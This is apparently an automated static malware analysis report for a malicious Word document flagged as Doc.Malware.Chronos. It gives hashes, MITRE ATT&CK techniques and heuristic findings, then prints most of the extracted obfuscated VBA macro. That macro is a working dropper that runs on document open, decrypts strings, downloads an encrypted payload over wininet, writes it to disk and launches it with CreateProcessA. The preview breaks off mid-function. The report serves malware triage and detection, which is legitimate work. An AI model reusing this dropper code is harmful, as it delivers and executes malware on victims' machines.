Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 8b40956af004b46c…

MALICIOUS

Office (OOXML)

40.6 KB Created: 2015-06-24 11:31:00 UTC Authoring application: Microsoft Office Word 14.0000 First seen: 2015-09-24
MD5: 76286c4c0100de704dc6bce7ca7e4070 SHA-1: 5e5d47f109d97547203fc51e45d804c686184371 SHA-256: 8b40956af004b46cfca528d3d0eabb3d68687c21b14f3de39255a5459a07ad5e
180 Risk Score

Malware Insights

MITRE ATT&CK
T1566.001 Spearphishing Attachment T1059.005 Visual Basic T1203 Exploitation for Client Execution

The sample is an OOXML document containing VBA macros, detected by ClamAV as Doc.Malware.Chronos-6897935-0. It employs a common lure, instructing the user to enable editing and content to view the document, which is a technique to bypass macro security. The VBA code is obfuscated but likely intended to download and execute a second-stage payload, as indicated by the presence of macro-related heuristics and the extracted artifact names.

Heuristics 7

  • ClamAV: Doc.Malware.Chronos-6897935-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Chronos-6897935-0
  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    IFjN9ulYESfIr = Environ(To0ZpEa9F(Chr(61) + Chr(21) + Chr(95) + Chr(194) + Chr(165) + Chr(133) + Chr(131), "QrvMIV7IaR")) & "\" & It8tuIaHe & To0ZpEa9F(Chr(209) + Chr(164) + Chr(144) + Chr(93), "NzARdlF585B")
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 22035 bytes
SHA-256: 26ae6ebf5832e2b0a54a02de5e960e81c0b96756344c97a2b89328919fc85fb5
Detection
ClamAV: No threats found
Obfuscation or payload: likely
167 of 287 identifiers look randomly generated (e.g. 'BngRFHoWqEP9px4SLw2hpn0TPXV3') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Private Type KzmrCfo
   DQOmajgoqBs As Integer
   P1XZ94F5eWRT As Integer
   JdCvwekg As Integer
   JRTb0gSBXq4JX As Integer
   LNuJtP2owmWl As Long
End Type
Private Declare Function InternetCloseHandle Lib "wininet" (ByRef YXWaLNj05jr As Long) As Long
Private Type HlRzISzhE
   YKd6yDvfGhyw As Byte
   RxISJrJnIg() As Byte
End Type
Private OO6Le6N5mfyHB As String
Private Declare Sub R4zDRCj9ZGX4 Lib "msvbvm60" Alias "#183" (ByVal BbCfKZp4 As Long, ByVal TiUCtaZMf7KxPT As Long, ByVal FmvY2Q3dg As Long)
Private TdzsHU(0 To 255) As Integer
Private Type QbvMWaGbelM
   HKz6epTMce4Rw As Long
   JdQV4h As Long
   PBd2WD6ATR9 As Long
   LlZq8O1sC0ITWY7 As Long
End Type
Private Type CEulnzy4
   QJLN1Qrltds As Long
   P1lPItKl As String
   KJ7FBdyUE8RP14 As String
   W99ddP9OE7W5Dog47 As String
   E0nZVondZrXelDtVg As Long
   XKrw72xNvDGawpZV As Long
   IXEzEAkYOI2P7vPGx As Long
   Gkt34nntCf As Long
   IwsdYu As Long
   PrtCcsJI As Long
   OfAvuk35 As Long
   SFqnnkfR As Long
   IRhDMZ As Integer
   PJQxkC As Integer
   EuvuGzOdVqZfFn As Long
   AITWY7R As Long
   Bkv8Vr28Vu As Long
   MnQXOfsJMqOvJv As Long
End Type
Private Declare Function CreateProcessA Lib "kernel32" (ByVal O4r0lcIQU As String, ByVal SWlsPyk7gWnE As String, IdBGxQ6ih18fpo As Any, M867aS As Any, ByVal BlrRFb08QEkc8 As Long, ByVal LgeVdJaWIOp6Y4nw As Long, W2M4B7vQC As Any, ByVal VU9C6uwdbII As String, QOIfkZsncPPn6er4c As CEulnzy4, VVt1vmGgPw As QbvMWaGbelM) As Long
Private Declare Function InternetOpenUrlA Lib "wininet" (ByVal Hqm5RMNoucuY0 As Long, ByVal F0tqWh As String, ByVal MCN2AUZbPe5 As String, ByVal NViipWaYIW As Long, ByVal LfvYlNTK As Long, ByVal KAfUQ06ZJs5 As Long) As Long
Private Declare Function InternetReadFile Lib "wininet" (ByVal R4JHRDp6Y4nw As Long, ByVal WrRn43uPVMvfuuGq4 As String, ByVal PowOBGwd0dz As Long, JbLEEReCWMQSpjex1 As Long) As Integer
Private Declare Function InternetOpenA Lib "wininet" (ByVal LleTcpZ88lyCL As String, ByVal IGuRP20iG33u3rPm As Long, ByVal XzCJ9oH2TaBwjAa As String, ByVal CFpmjIinV As String, ByVal Yd37Q8YNH As Long) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal HBhVnkaNn3RQy1D As Long) As Long
Private Property Let LW87K(RZvj As String)
Dim D8tCj7gh As Long, Fi39CcIT As Long, CmA6UNTxaLLq As Byte, CklMK3() As Byte, OtVa8lxJ As Long
If (OO6Le6N5mfyHB = RZvj) Then Exit Property
OO6Le6N5mfyHB = RZvj
CklMK3() = StrConv(OO6Le6N5mfyHB, vbFromUnicode)
OtVa8lxJ = Len(OO6Le6N5mfyHB)
For D8tCj7gh = 0 To 255
TdzsHU(D8tCj7gh) = D8tCj7gh
Next D8tCj7gh
For D8tCj7gh = 0 To 255
Fi39CcIT = (Fi39CcIT + TdzsHU(D8tCj7gh) + CklMK3(D8tCj7gh Mod OtVa8lxJ)) Mod 256
CmA6UNTxaLLq = TdzsHU(D8tCj7gh)
TdzsHU(D8tCj7gh) = TdzsHU(Fi39CcIT)
TdzsHU(Fi39CcIT) = CmA6UNTxaLLq
Next
End Property
Private Sub Document_Open()
On Error Resume Next
Dim LrhEyMNzSbtNbm As Long, G3WXll As Long
LrhEyMNzSbtNbm = 44
G3WXll = 77
If LrhEyMNzSbtNbm + G3WXll > 4 Then
G3WXll = LrhEyMNzSbtNbm + 50
Else
MsgBox 58
End If
Dim IFjN9ulYESfIr As String
Dim IdLM486ftJmOxqJ As Long, PJHzSuvvBMzHQwe As Long
IdLM486ftJmOxqJ = 92
PJHzSuvvBMzHQwe = 6
If IdLM486ftJmOxqJ + PJHzSuvvBMzHQwe > 4 Then
PJHzSuvvBMzHQwe = IdLM486ftJmOxqJ + 20
Else
MsgBox 77
End If
Dim BsYA4yf10D As Long, UwtGDyPpJm As Long, VKKt51CVzS As Long, V0lhPe5 As Integer
Dim IuPlhqmT As Long, HGuj6uUhK2A1ueBZq As Long
IuPlhqmT = 19
HGuj6uUhK2A1ueBZq = 81
If IuPlhqmT + HGuj6uUhK2A1ueBZq > 4 Then
HGuj6uUhK2A1ueBZq = IuPlhqmT + 93
Else
MsgBox 30
End If
BsYA4yf10D = 944279623: UwtGDyPpJm = 0: VKKt51CVzS = 0
Dim KfyvUjZ0az7i8eSrN As Long, Ns3eBWR1d0cHphx As Long
KfyvUjZ0az7i8eSrN = 70
Ns3eBWR1d0cHphx = 25
If KfyvUjZ0az7i8eSrN + Ns3eBWR1d0cHphx > 4 Then
Ns3eBWR1d0cHphx = KfyvUjZ0az7i8eSrN + 34
Else
MsgBox 61
End If
For UwtGDyPpJm = 1 To BsYA4yf10D
VKKt51CVzS = VKKt51CVzS + 1
Next UwtGDyPpJm
Dim Mjbbk2Uok4myf As Long, P9fn7sZ65WfcY As Long
Mjbbk2Uok4myf = 87
P9fn7sZ65WfcY = 36
If Mjbbk2Uok4myf + P9fn7sZ65WfcY > 4 Then
P9fn7sZ65WfcY = Mjbbk2Uok4myf + 52
Else
MsgBox 32
End If
If VKKt51CVzS = BsYA4yf10D Then
Dim N1BaTShmbFXcQ72uQ As Long, PhCBA73t7Cw As Long
N1BaTShmbFXcQ72uQ = 26
PhCBA73t7Cw = 84
If N1BaTShmbFXcQ72uQ + PhCBA73t7Cw > 4 Then
PhCBA73t7Cw = N1BaTShmbFXcQ72uQ + 9
Else
MsgBox 8
End If
IFjN9ulYESfIr = Environ(To0ZpEa9F(Chr(61) + Chr(21) + Chr(95) + Chr(194) + Chr(165) + Chr(133) + Chr(131), "QrvMIV7IaR")) & "\" & It8tuIaHe & To0ZpEa9F(Chr(209) + Chr(164) + Chr(144) + Chr(93), "NzARdlF585B")
Dim YUHu3Dttx4V As Long, MTrJGtFgSUEiYq As Long
YUHu3Dttx4V = 13
MTrJGtFgSUEiYq = 97
If YUHu3Dttx4V + MTrJGtFgSUEiYq > 4 Then
MTrJGtFgSUEiYq = YUHu3Dttx4V + 67
Else
MsgBox 33
End If
If GYBCUq6CRZK(To0ZpEa9F(Chr(149) + Chr(245) + Chr(46) + Chr(54) + Chr(52) + Chr(55) + Chr(240) + Chr(210) + Chr(17) + Chr(143) + Chr(68) + Chr(119) + Chr(216) + Chr(56) + Chr(59) + Chr(58) + Chr(252) + Chr(231) + Chr(173) + Chr(65) + Chr(32) + Chr(174) + Chr(227) + Chr(2) + Chr(16) + Chr(162), "HcVgomhQCkSRZi"), IFjN9ulYESfIr, To0ZpEa9F(Chr(179) + Chr(248) + Chr(82) + Chr(99) + Chr(231) + Chr(118) + Chr(95) + Chr(170) + Chr(208), "L8QWRUcNrUOUv4CMi")) = True Then
Dim B4myfrBniKM As Long, RjUq6y As Long
B4myfrBniKM = 90
RjUq6y = 62
If B4myfrBniKM + RjUq6y > 4 Then
RjUq6y = B4myfrBniKM + 48
Else
MsgBox 62
End If
L3PYSyBOUv4CMi 1
Dim HK1z6BOLsTYEhTb96 As Long, HF006exhMdkW0cId As Long
HK1z6BOLsTYEhTb96 = 24
HF006exhMdkW0cId = 88
If HK1z6BOLsTYEhTb96 + HF006exhMdkW0cId > 4 Then
HF006exhMdkW0cId = HK1z6BOLsTYEhTb96 + 22
Else
MsgBox 94
End If
HVhnSWZe IFjN9ulYESfIr
Dim JBMVOyyL7M As Long, TelFYn7J As Long
JBMVOyyL7M = 79
TelFYn7J = 23
If JBMVOyyL7M + TelFYn7J > 4 Then
TelFYn7J = JBMVOyyL7M + 91
Else
MsgBox 12
End If
End If
Dim VjsC52OZ As Long, VqUY2YuaJ As Long
VjsC52OZ = 74
VqUY2YuaJ = 36
If VjsC52OZ + VqUY2YuaJ > 4 Then
VqUY2YuaJ = VjsC52OZ + 53
Else
MsgBox 54
End If
ActiveDocument.Range.Text = To0ZpEa9F(Chr(23) + Chr(228) + Chr(176) + Chr(223) + Chr(81) + Chr(206) + Chr(46) + Chr(52) + Chr(131) + Chr(252) + Chr(37) + Chr(230) + Chr(129) + Chr(179) + Chr(144) + Chr(60) + Chr(33) + Chr(168) + Chr(138) + Chr(61) + Chr(216) + Chr(182) + Chr(51) + Chr(78) + Chr(215) + Chr(142) + Chr(87) + Chr(132) + Chr(235) + Chr(101) + Chr(57) + Chr(49) + Chr(210) + Chr(207) + Chr(4) + Chr(84) + Chr(160) + Chr(178) + Chr(224) + Chr(30) + Chr(190) + Chr(228) + Chr(7) + Chr(75) + Chr(76) + Chr(195) + Chr(91) + Chr(93) + Chr(131) + Chr(12) + Chr(0) + Chr(10) + Chr(141) + Chr(160) + Chr(158) + Chr(236) + Chr(73) + Chr(126) + Chr(202) + Chr(112) + Chr(74) + Chr(249) + Chr(37) + Chr(244) + Chr(30) + Chr(49) + Chr(182) + Chr(12) + Chr(76) + Chr(78) + Chr(133), "BsZ5RYrQugc")
End If
Dim XWc93zgm4pQ As Long, Kkk3KRYEhTb96 As Long
XWc93zgm4pQ = 44
Kkk3KRYEhTb96 = 55
If XWc93zgm4pQ + Kkk3KRYEhTb96 > 4 Then
Kkk3KRYEhTb96 = XWc93zgm4pQ + 48
Else
MsgBox 70
End If
End Sub
Function To0ZpEa9F(FCVtzQbl As String, GmgpSGiRjc4 As String) As String
Dim CiOvo8Dl278T As Long, GQ2EPlkfSwZM As Long
CiOvo8Dl278T = 1
GQ2EPlkfSwZM = 84
If CiOvo8Dl278T + GQ2EPlkfSwZM > 4 Then
GQ2EPlkfSwZM = CiOvo8Dl278T + 32
Else
MsgBox 88
End If
Dim byteArray() As Byte
byteArray() = StrConv(FCVtzQbl, vbFromUnicode)
PRRs1ljB byteArray(), GmgpSGiRjc4
To0ZpEa9F = StrConv(byteArray(), vbUnicode)
Dim Wc3fH3886 As Long, QL9GSfLNIjGmH As Long
Wc3fH3886 = 22
QL9GSfLNIjGmH = 20
If Wc3fH3886 + QL9GSfLNIjGmH > 4 Then
QL9GSfLNIjGmH = Wc3fH3886 + 51
Else
MsgBox 58
End If
End Function
Private Sub E2sg3z(BEm() As KzmrCfo, SdSbELPgRlofMxlS As Long, G4UoJ4Flj As Long, B4GUYaCqg As HlRzISzhE)
Dim IZJTiaCK As Integer, XiYOJqPLrBod As Long
XiYOJqPLrBod = 0
For IZJTiaCK = 0 To (B4GUYaCqg.YKd6yDvfGhyw - 1)
If (B4GUYaCqg.RxISJrJnIg(IZJTiaCK) = 0) Then
If (BEm(XiYOJqPLrBod).JdCvwekg = -1) Then
BEm(XiYOJqPLrBod).JdCvwekg = SdSbELPgRlofMxlS
BEm(SdSbELPgRlofMxlS).DQOmajgoqBs = XiYOJqPLrBod
BEm(SdSbELPgRlofMxlS).JdCvwekg = -1
BEm(SdSbELPgRlofMxlS).P1XZ94F5eWRT = -1
BEm(SdSbELPgRlofMxlS).JRTb0gSBXq4JX = -1
SdSbELPgRlofMxlS = SdSbELPgRlofMxlS + 1
End If
XiYOJqPLrBod = BEm(XiYOJqPLrBod).JdCvwekg
ElseIf (B4GUYaCqg.RxISJrJnIg(IZJTiaCK) = 1) Then
If (BEm(XiYOJqPLrBod).P1XZ94F5eWRT = -1) Then
BEm(XiYOJqPLrBod).P1XZ94F5eWRT = SdSbELPgRlofMxlS
BEm(SdSbELPgRlofMxlS).DQOmajgoqBs = XiYOJqPLrBod
BEm(SdSbELPgRlofMxlS).JdCvwekg = -1
BEm(SdSbELPgRlofMxlS).P1XZ94F5eWRT = -1
BEm(SdSbELPgRlofMxlS).JRTb0gSBXq4JX = -1
SdSbELPgRlofMxlS = SdSbELPgRlofMxlS + 1
End If
XiYOJqPLrBod = BEm(XiYOJqPLrBod).P1XZ94F5eWRT
Else
Stop
End If
Next
BEm(XiYOJqPLrBod).JRTb0gSBXq4JX = G4UoJ4Flj
End Sub
Sub L3PYSyBOUv4CMi(QtRwukMsH0w As Long)
Dim YOWWpfnb9HuAdSPi3 As Long, AyMM7Se As Long
YOWWpfnb9HuAdSPi3 = 96
AyMM7Se = 93
If YOWWpfnb9HuAdSPi3 + AyMM7Se > 4 Then
AyMM7Se = YOWWpfnb9HuAdSPi3 + 4
Else
MsgBox 74
End If
Dim M9HDhmahobk As Long
Dim WG2JAGvGgku As Long, Pnp0G6tglNOX As Long
WG2JAGvGgku = 63
Pnp0G6tglNOX = 47
If WG2JAGvGgku + Pnp0G6tglNOX > 4 Then
Pnp0G6tglNOX = WG2JAGvGgku + 95
Else
MsgBox 25
End If
M9HDhmahobk = Timer + QtRwukMsH0w
Do While Timer < M9HDhmahobk
DoEvents
Loop
Dim FEJm4X8WKc As Long, PxidURjPtKGwK As Long
FEJm4X8WKc = 51
PxidURjPtKGwK = 4
If FEJm4X8WKc + PxidURjPtKGwK > 4 Then
PxidURjPtKGwK = FEJm4X8WKc + 47
Else
MsgBox 71
End If
End Sub
Private Function GYBCUq6CRZK(ByVal Hx9OQUaJsUfEkEb8 As String, ByVal HmQ5wsmQo As String, ByVal HnHlFrWgiJ As String) As Boolean
Dim LLIszQY As Long, I0xbe As Long
LLIszQY = 60
I0xbe = 3
If LLIszQY + I0xbe > 4 Then
I0xbe = LLIszQY + 50
Else
MsgBox 61
End If
Dim N5llbhyOzSxdAL As Long, MnBmsHlCku As Long, GqlL As Long, USPp8D As String * 8162, BqX2EHBOH0psu8a As String, H812eoQhHgf As Integer, K0enJI8E0 As Double
Dim OdHyVjX3LAtZ As Long, JJdhMxsEetaLx As Long
OdHyVjX3LAtZ = 5
JJdhMxsEetaLx = 44
If OdHyVjX3LAtZ + JJdhMxsEetaLx > 4 Then
JJdhMxsEetaLx = OdHyVjX3LAtZ + 80
Else
MsgBox 69
End If
N5llbhyOzSxdAL = InternetOpenA(To0ZpEa9F(Chr(29) + Chr(188) + Chr(143) + Chr(8) + Chr(64) + Chr(203) + Chr(17) + Chr(78) + Chr(165) + Chr(192) + Chr(207) + Chr(55) + Chr(136) + Chr(134) + Chr(173) + Chr(102) + Chr(136) + Chr(185) + Chr(95) + Chr(148) + Chr(74) + Chr(95) + Chr(47) + Chr(8) + Chr(207) + Chr(12) + Chr(221) + Chr(216) + Chr(255) + Chr(255) + Chr(56) + Chr(249) + Chr(212) + Chr(181) + Chr(28) + Chr(74) + Chr(234) + Chr(254) + Chr(33) + Chr(76) + Chr(42) + Chr(213) + Chr(46) + Chr(203) + Chr(205) + Chr(19) + Chr(130) + Chr(164) + Chr(22) + Chr(100) + Chr(191) + Chr(246) + Chr(64) + Chr(193) + Chr(184) + Chr(187) + Chr(23) + Chr(19) + Chr(37) + Chr(232) + Chr(112) + Chr(138) + Chr(138) + Chr(116) + Chr(242) + Chr(226) + Chr(15), "Ag6UY60Zw3urvkD"), 1, vbNullString, vbNullString, 0)
Dim FBPNdCUCjoQEK As Long, FT0MSMdjlABG As Long
FBPNdCUCjoQEK = 10
FT0MSMdjlABG = 13
If FBPNdCUCjoQEK + FT0MSMdjlABG > 4 Then
FT0MSMdjlABG = FBPNdCUCjoQEK + 75
Else
MsgBox 87
End If
If N5llbhyOzSxdAL = 0 Then
Dim GjjeqPOO7XuYEW2 As Long, UzZucqT9YQ As Long
GjjeqPOO7XuYEW2 = 33
UzZucqT9YQ = 43
If GjjeqPOO7XuYEW2 + UzZucqT9YQ > 4 Then
UzZucqT9YQ = GjjeqPOO7XuYEW2 + 14
Else
MsgBox 1
End If
  GYBCUq6CRZK = False
  Exit Function
End If
Dim YXLRVM5jFXfif As Long, DFeUTI1kp3 As Long
YXLRVM5jFXfif = 79
DFeUTI1kp3 = 50
If YXLRVM5jFXfif + DFeUTI1kp3 > 4 Then
DFeUTI1kp3 = YXLRVM5jFXfif + 63
Else
MsgBox 77
End If
MnBmsHlCku = InternetOpenUrlA(N5llbhyOzSxdAL, Hx9OQUaJsUfEkEb8, vbNullString, 0, &H4000000, 0)
Dim QYmC As Long, KuuE0ODGHjwI As Long
QYmC = 18
KuuE0ODGHjwI = 35
If QYmC + KuuE0ODGHjwI > 4 Then
KuuE0ODGHjwI = QYmC + 36
Else
MsgBox 33
End If
If MnBmsHlCku = 0 Then
Dim NgEFxcR0zt2m08 As Long, BZxzvyY4MvbM As Long
NgEFxcR0zt2m08 = 65
BZxzvyY4MvbM = 92
If NgEFxcR0zt2m08 + BZxzvyY4MvbM > 4 Then
BZxzvyY4MvbM = NgEFxcR0zt2m08 + 12
Else
MsgBox 79
End If
  K0enJI8E0 = 0
Else
Dim DhRDaNQOpODWERED As Long, QeewohZTcLc As Long
DhRDaNQOpODWERED = 62
QeewohZTcLc = 56
If DhRDaNQOpODWERED + QeewohZTcLc > 4 Then
QeewohZTcLc = DhRDaNQOpODWERED + 42
Else
MsgBox 89
End If
InternetReadFile MnBmsHlCku, USPp8D, 8162, GqlL
BqX2EHBOH0psu8a = USPp8D
Dim WqT9YQd67 As Long, GpaI5D2 As Long
WqT9YQd67 = 55
GpaI5D2 = 75
If WqT9YQd67 + GpaI5D2 > 4 Then
GpaI5D2 = WqT9YQd67 + 16
Else
MsgBox 42
End If
Do While GqlL <> 0
  InternetReadFile MnBmsHlCku, USPp8D, 8162, GqlL
  BqX2EHBOH0psu8a = BqX2EHBOH0psu8a + Mid(USPp8D, 1, GqlL)
Loop
K0enJI8E0 = Len(BqX2EHBOH0psu8a)
Dim BrDrUpnykfcK As Long, C3wAyRVcu As Long
BrDrUpnykfcK = 82
C3wAyRVcu = 41
If BrDrUpnykfcK + C3wAyRVcu > 4 Then
C3wAyRVcu = BrDrUpnykfcK + 92
Else
MsgBox 64
End If
H812eoQhHgf = FreeFile
Dim SiTviODK As Long, UDlq As Long
SiTviODK = 89
UDlq = 15
If SiTviODK + UDlq > 4 Then
UDlq = SiTviODK + 94
Else
MsgBox 56
End If
Open HmQ5wsmQo For Binary Access Write Lock Write As #H812eoQhHgf
Put #H812eoQhHgf, , Ag9IiL(To0ZpEa9F(BqX2EHBOH0psu8a, HnHlFrWgiJ))
Dim YBfoXNO81 As Long, D5L6hliG As Long
YBfoXNO81 = 86
D5L6hliG = 81
If YBfoXNO81 + D5L6hliG > 4 Then
D5L6hliG = YBfoXNO81 + 69
Else
MsgBox 5
End If
Close #H812eoQhHgf
End If
InternetCloseHandle MnBmsHlCku
Dim Fl4tqfLCjqSV As Long, YvwMqOi7FT As Long
Fl4tqfLCjqSV = 68
YvwMqOi7FT = 62
If Fl4tqfLCjqSV + YvwMqOi7FT > 4 Then
YvwMqOi7FT = Fl4tqfLCjqSV + 7
Else
MsgBox 48
End If
InternetCloseHandle N5llbhyOzSxdAL
BqX2EHBOH0psu8a = ""
If K0enJI8E0 Then
  GYBCUq6CRZK = True
Dim B4GQyh1Vto As Long, BngRFHoWqEP9px4SLw2hpn0TPXV3 As Long
B4GQyh1Vto = 63
BngRFHoWqEP9px4SLw2hpn0TPXV3 = 78
If B4GQyh1Vto + BngRFHoWqEP9px4SLw2hpn0TPXV3 > 4 Then
BngRFHoWqEP9px4SLw2hpn0TPXV3 = B4GQyh1Vto + 58
Else
MsgBox 19
End If
End If
Dim VrTHO7wuMq5fj3h As Long, FxJITGmAje3 As Long
VrTHO7wuMq5fj3h = 29
FxJITGmAje3 = 81
If VrTHO7wuMq5fj3h + FxJITGmAje3 > 4 Then
FxJITGmAje3 = VrTHO7wuMq5fj3h + 97
Else
MsgBox 22
End If
End Function
Private Function HVhnSWZe(Wfvi4jwg34pX As String)
Dim HnMK5iJRjDAq9KwQ As Long, GyJvw As Long
HnMK5iJRjDAq9KwQ = 39
GyJvw = 49
If HnMK5iJRjDAq9KwQ + GyJvw > 4 Then
GyJvw = HnMK5iJRjDAq9KwQ + 20
Else
MsgBox 7
End If
Dim C871x8 As QbvMWaGbelM, Ki3pZrLe3 As CEulnzy4, C4mvpcU23VKqK As String
Dim GQq0rDfGIwehx3 As Long, UIZml As Long
GQq0rDfGIwehx3 = 39
UIZml = 29
If GQq0rDfGIwehx3 + UIZml > 4 Then
UIZml = GQq0rDfGIwehx3 + 85
Else
MsgBox 16
End If
Ki3pZrLe3.QJLN1Qrltds = Len(Ki3pZrLe3)
Dim WeSLPk0c2mU As Long, JDaLp2sg As Long
WeSLPk0c2mU = 30
JDaLp2sg = 54
If WeSLPk0c2mU + JDaLp2sg > 4 Then
JDaLp2sg = WeSLPk0c2mU + 9
Else
MsgBox 46
End If
CreateProcessA C4mvpcU23VKqK, Wfvi4jwg34pX, ByVal 0&, ByVal 0&, 1&, &H20&, ByVal 0&, C4mvpcU23VKqK, Ki3pZrLe3, C871x8
Dim J7iDTyk4s As Long, UTRO3tu78r As Long
J7iDTyk4s = 69
UTRO3tu78r = 63
If J7iDTyk4s + UTRO3tu78r > 4 Then
UTRO3tu78r = J7iDTyk4s + 8
Else
MsgBox 49
End If
CloseHandle C871x8.JdQV4h
Dim RPyAO0AovAk1Nn As Long, MbnSByU As Long
RPyAO0AovAk1Nn = 48
MbnSByU = 98
If RPyAO0AovAk1Nn + MbnSByU > 4 Then
MbnSByU = RPyAO0AovAk1Nn + 29
Else
MsgBox 10
End If
CloseHandle C871x8.HKz6epTMce4Rw
Dim Q9EsvswRpqeI As Long, G2jmXwt2I As Long
Q9EsvswRpqeI = 74
G2jmXwt2I = 47
If Q9EsvswRpqeI + G2jmXwt2I > 4 Then
G2jmXwt2I = Q9EsvswRpqeI + 55
Else
MsgBox 6
End If
End Function
Private Sub Jxl7tQ1YA9KN(Of59exs1YhnhN() As Byte, UETEV5Ntp As Long)
Dim Ov8Y1m5gmV As Long, YeXMqSI As Long, LtW0A89oO As Byte, PaIMkTy8g9l As Long, T1uECa1evuQQy66 As Integer, PFF66nIlwotlH0u As Byte, XcNXxg2kxIX() As Byte, MF7xZ0ayCLYSuxk As Integer
Dim BuOPR As Long, Fg3zE As Byte, DuAjUZ88 As Long, LlofMxlSOZ0 As Long, PL6lLbh4GUYa As Long, IKEus7dkvav(0 To 7) As Byte, RJroHLVuZpEa9F(0 To 511) As KzmrCfo, VomeuyD(0 To 255) As HlRzISzhE
PaIMkTy8g9l = 1
PFF66nIlwotlH0u = Of59exs1YhnhN(PaIMkTy8g9l - 1)
PaIMkTy8g9l = PaIMkTy8g9l + 1
R4zDRCj9ZGX4 4, VarPtr(DuAjUZ88), VarPtr(Of59exs1YhnhN(PaIMkTy8g9l - 1))
PaIMkTy8g9l = PaIMkTy8g9l + 4
PL6lLbh4GUYa = DuAjUZ88
If (DuAjUZ88 = 0) Then Exit Sub
ReDim XcNXxg2kxIX(0 To DuAjUZ88 - 1)
R4zDRCj9ZGX4 2, VarPtr(T1uECa1evuQQy66), VarPtr(Of59exs1YhnhN(PaIMkTy8g9l - 1))
PaIMkTy8g9l = PaIMkTy8g9l + 2
For Ov8Y1m5gmV = 1 To T1uECa1evuQQy66
With VomeuyD(Of59exs1YhnhN(PaIMkTy8g9l - 1))
PaIMkTy8g9l = PaIMkTy8g9l + 1
.YKd6yDvfGhyw = Of59exs1YhnhN(PaIMkTy8g9l - 1)
PaIMkTy8g9l = PaIMkTy8g9l + 1
ReDim .RxISJrJnIg(0 To .YKd6yDvfGhyw - 1)
End With
Next
IKEus7dkvav(0) = 2 ^ 0
IKEus7dkvav(1) = 2 ^ 1
IKEus7dkvav(2) = 2 ^ 2
IKEus7dkvav(3) = 2 ^ 3
IKEus7dkvav(4) = 2 ^ 4
IKEus7dkvav(5) = 2 ^ 5
IKEus7dkvav(6) = 2 ^ 6
IKEus7dkvav(7) = 2 ^ 7
Fg3zE = Of59exs1YhnhN(PaIMkTy8g9l - 1)
PaIMkTy8g9l = PaIMkTy8g9l + 1
MF7xZ0ayCLYSuxk = 0
For Ov8Y1m5gmV = 0 To 255
With VomeuyD(Ov8Y1m5gmV)
If (.YKd6yDvfGhyw > 0) Then
For YeXMqSI = 0 To (.YKd6yDvfGhyw - 1)
If (Fg3zE And IKEus7dkvav(MF7xZ0ayCLYSuxk)) Then .RxISJrJnIg(YeXMqSI) = 1
MF7xZ0ayCLYSuxk = MF7xZ0ayCLYSuxk + 1
If (MF7xZ0ayCLYSuxk = 8) Then
Fg3zE = Of59exs1YhnhN(PaIMkTy8g9l - 1)
PaIMkTy8g9l = PaIMkTy8g9l + 1
MF7xZ0ayCLYSuxk = 0
End If
Next
End If
End With
Next
If (MF7xZ0ayCLYSuxk = 0) Then PaIMkTy8g9l = PaIMkTy8g9l - 1
LlofMxlSOZ0 = 1
RJroHLVuZpEa9F(0).JdCvwekg = -1
RJroHLVuZpEa9F(0).P1XZ94F5eWRT = -1
RJroHLVuZpEa9F(0).DQOmajgoqBs = -1
RJroHLVuZpEa9F(0).JRTb0gSBXq4JX = -1
For Ov8Y1m5gmV = 0 To 255
E2sg3z RJroHLVuZpEa9F(), LlofMxlSOZ0, Ov8Y1m5gmV, VomeuyD(Ov8Y1m5gmV)
Next
DuAjUZ88 = 0
For PaIMkTy8g9l = PaIMkTy8g9l To UETEV5Ntp
Fg3zE = Of59exs1YhnhN(PaIMkTy8g9l - 1)
For MF7xZ0ayCLYSuxk = 0 To 7
If (Fg3zE And IKEus7dkvav(MF7xZ0ayCLYSuxk)) Then BuOPR = RJroHLVuZpEa9F(BuOPR).P1XZ94F5eWRT Else BuOPR = RJroHLVuZpEa9F(BuOPR).JdCvwekg
If (RJroHLVuZpEa9F(BuOPR).JRTb0gSBXq4JX > -1) Then
XcNXxg2kxIX(DuAjUZ88) = RJroHLVuZpEa9F(BuOPR).JRTb0gSBXq4JX
